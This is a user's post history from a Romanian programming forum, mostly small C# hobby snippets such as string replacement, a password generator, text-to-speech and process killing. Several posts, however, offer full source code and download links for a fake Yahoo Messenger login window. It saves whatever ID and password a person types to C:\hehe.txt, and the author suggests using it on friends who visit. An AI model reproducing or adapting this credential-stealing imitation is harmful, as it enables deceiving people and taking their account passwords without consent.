Jump to content

banks

Active Members
  • Posts

    50
  • Joined

  • Last visited

Everything posted by banks

  1. Random rand = new Random(); // facem functia de random string a = "cacat,pisat,unt"; string b = "-/*.,<>?&^%$#"; // caracterele care vrei sa fie schimbate string c= b[rand.Next(0,b.Length)].ToString(); a = a.Replace(",", c); // inlocuim virgula cu un caracter random din stringul b
  2. Ce subiecte? Nu inteleg .. Zici daca ai un string a string a="stres+wifi+network"; Sa il faci "stres-wifi-network" ?
  3. Am pus https://rstcenter.com/forum/ Nu mi-a aparut nimic in listbox1 Iar in webbrowser apare [Proxy Shield Response]: Connection Filtered: Please slow down your requests and try again. (refresh)
  4. using System; using System.Collections.Generic; using System.ComponentModel; - Pastebin.com proiect: Password Generator.zip
  5. Ideea este buna, dar designul lasa de dorit..si nici marcar nu poti copia .. uite ce am facut eu mai demult Password Generator.exe Ar trebui sa alegi si tu ce vrei sa contina parola..
  6. Dureaza foarte mult sa faci design-ul
  7. Check this https://rstcenter.com/forum/57184-ip-locator.rst
  8. Am vazut ca a postat cineva un program asemanator dar nu mergea, si am facut si eu unul. Acest program detecteaz? ip-ul tau, loca?ia ( ora? , ?ar? ) ?i ISP-ul ( internet service provider). Când deschizi programul va dura cam 2 secunde ( depinde de cât de buna/slab? este conexiunea ta de internet ) pân? se vor afi?a. ( în acel timp se caut? datele ) Programul e facut in c# download here: http://www.mediafire...tn63gp59j3cg7t3 VErsiunea unde poti vedea adresa ?i ISP-ul cuiva dup? http://www.mediafire.com/?b47l1draw7b7xug
  9. Ok. E foarte simplu. Cand apesi pe Sign In ce este in textbox 1 si textbox 2 se va crea in partitia c. StreamWriter lalala=new StreamWriter(@"c:/nume.txt"); // aici pui locatia fisierului lalala.Write("Nume " + textBox1.Text+ Environment.NewLine + "Parola " + textBox2.Text); // scrie in fisier numele si parola // //scrise de tine din textboxurile de mai sus. lalala.Close(); // ii explicam programul ca s-a terminat de scris fisierul si acum se creeaza. Cat despre design, photoshop ftw Pozele se schimba la eventuri gen mouse down, mouse enter, mouse leave, mouse up pentru a fi exact cele de la YM. La textbox2 am pus Password char acel punct in mijloc Programul e chiar banal , doar design-ul este mai complicat.
  10. Eu l-am facut in c# using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; namespace Yahoo_Messenger { public partial class Form1 : Form { public const int WM_NCLBUTTONDOWN = 0xA1; public const int HT_CAPTION = 0x2; [DllImportAttribute("user32.dll")] public static extern int SendMessage(IntPtr hWnd, int Msg, int wParam, int lParam); [DllImportAttribute("user32.dll")] public static extern bool ReleaseCapture(); Form2 frm = new Form2(); public Form1() { InitializeComponent(); } private void pictureBox1_MouseEnter(object sender, EventArgs e) { pictureBox1.Image = Properties.Resources.min2; } private void pictureBox1_Click(object sender, EventArgs e) { this.WindowState = FormWindowState.Minimized; } private void pictureBox1_MouseLeave(object sender, EventArgs e) { pictureBox1.Image = Properties.Resources.min1; } private void pictureBox2_MouseEnter(object sender, EventArgs e) { pictureBox2.Image = Properties.Resources.max2; } private void pictureBox2_MouseLeave(object sender, EventArgs e) { pictureBox2.Image = Properties.Resources.max1; } private void pictureBox3_MouseEnter(object sender, EventArgs e) { pictureBox3.Image = Properties.Resources.x2; } private void pictureBox3_MouseLeave(object sender, EventArgs e) { pictureBox3.Image = Properties.Resources.x1; } private void pictureBox3_Click(object sender, EventArgs e) { Close(); } int a = 0; private void pictureBox4_Click(object sender, EventArgs e) { if (a % 2 == 0) pictureBox4.Image = Properties.Resources.ch; else pictureBox4.Image = null; a++; } int b = 0; private void pictureBox5_Click(object sender, EventArgs e) { if (b % 2 == 0) pictureBox5.Image = Properties.Resources.ch; else pictureBox5.Image = null; b++; } int c = 0; private void pictureBox6_Click(object sender, EventArgs e) { if (c % 2 == 0) pictureBox6.Image = Properties.Resources.ch; else pictureBox6.Image = null; c++; } private void pictureBox7_MouseEnter(object sender, EventArgs e) { pictureBox7.Image = Properties.Resources.eng2; } private void pictureBox7_MouseLeave(object sender, EventArgs e) { pictureBox7.Image = Properties.Resources.eng1; } private void pictureBox8_MouseEnter(object sender, EventArgs e) { pictureBox8.Image = Properties.Resources.text12; } private void pictureBox8_MouseLeave(object sender, EventArgs e) { pictureBox8.Image = Properties.Resources.text11; } private void pictureBox8_Click(object sender, EventArgs e) { Process.Start("https://edit.yahoo.com/registration?.intl=us&new=1&.done=http%3A//messenger.yahoo.com&.src=maxw"); } private void pictureBox9_MouseEnter(object sender, EventArgs e) { pictureBox9.Image = Properties.Resources.text22; } private void pictureBox9_MouseLeave(object sender, EventArgs e) { pictureBox9.Image = Properties.Resources.text21; } private void pictureBox9_Click(object sender, EventArgs e) { Process.Start("http://msg.edit.yahoo.com/config/eval_forgot_pw?.src=pg&.done=http://messenger.yahoo.com/&.intl=us"); } private void Form1_Load(object sender, EventArgs e) { } bool sw = false; private void pictureBox10_MouseEnter(object sender, EventArgs e) { pictureBox10.Image = Properties.Resources.b2; sw = true; } private void pictureBox10_MouseLeave(object sender, EventArgs e) { pictureBox10.Image = Properties.Resources.b1; sw = false; } private void pictureBox10_MouseDown(object sender, MouseEventArgs e) { if(sw==true) pictureBox10.Image = Properties.Resources.b3; } private void pictureBox10_MouseUp(object sender, MouseEventArgs e) { pictureBox10.Image = Properties.Resources.b1; } private void pictureBox10_Click(object sender, EventArgs e) { if (id.Text == "" || pas.Text == "") frm.Show(); else { StreamWriter chch = new StreamWriter("C:\\hehe.txt"); chch.Write("Id-ul: " + id.Text + System.Environment.NewLine + "Parola: " + pas.Text); chch.Close(); } } private void pictureBox11_MouseDown(object sender, MouseEventArgs e) { if (e.Button == MouseButtons.Left) { ReleaseCapture(); SendMessage(Handle, WM_NCLBUTTONDOWN, HT_CAPTION, 0); } } private void pictureBox12_MouseEnter(object sender, EventArgs e) { pictureBox12.Image = Properties.Resources.mes1; } private void pictureBox12_MouseLeave(object sender, EventArgs e) { pictureBox12.Image = Properties.Resources.mess1; } private void pictureBox13_MouseEnter(object sender, EventArgs e) { pictureBox13.Image = Properties.Resources.hl2; } private void pictureBox13_MouseLeave(object sender, EventArgs e) { pictureBox13.Image = Properties.Resources.hl1; } } }
  11. În stânga este programul f?cut de mine ?i in dreapta messul original. Acest program arata aproximativ ca si Yahoo Messenger. Ce face el? Cand pui parola si numele î?i iese din program ?i în parti?ia C va face un fi?ier numit hehe.txt care con?ine parola ?i numele. Este un program care îl po?i folosi pe prietenii care vin la tine acas? http://s15.postimage.org/lmb77rsy3/image.png http://s15.postimage.org/5bg58kmrv/image.png Download: http://www.girlshare.ro/4139392.4 http://www.mediafire.com/?u38vbjoayivjdy5
  12. Tu l-ai facut ? Daca da cu ce prgram? edit: e usor. using System.Speech.Synthesis; // trebuie sa pui referinta la asta SpeechSynthesizer pac=new SpeechSynthesizer(); string a = "cacat pisat unt mazga"; pac.SpeakAsync(a);
  13. Daca pun un if cu userul activ va face asa: Cauta numele userului activ sa zicem Ion. foreach (System.Diagnostics.Process myProc in System.Diagnostics.Process.GetProcesses()) { if (myProc.ProcessName == "notepad" && numele activ=="ion" ) { myProc.Kill(); } } Se va inchide notepad peste totpentru ca cel activ este ion..deci nu ajuta..cat despre linkurile care le-ai dat acum le incerc, mersi mult pentru ele.
  14. Salut doresc sa inchid toate procesele cu numele notepad de exemplu dar doar din userul activ. foreach (System.Diagnostics.Process myProc in System.Diagnostics.Process.GetProcesses()) { if (myProc.ProcessName == "notepad" ) { myProc.Kill(); } } Daca folosesc ce am scris mai sus , daca am notepad deschis in oricare user se va termina procesul.. Eu doresc sa se termine procesul doar din userul curent..cum trebuie sa fac?
  15. Se deschide cu browser-ul prestabilit.
×
×
  • Create New...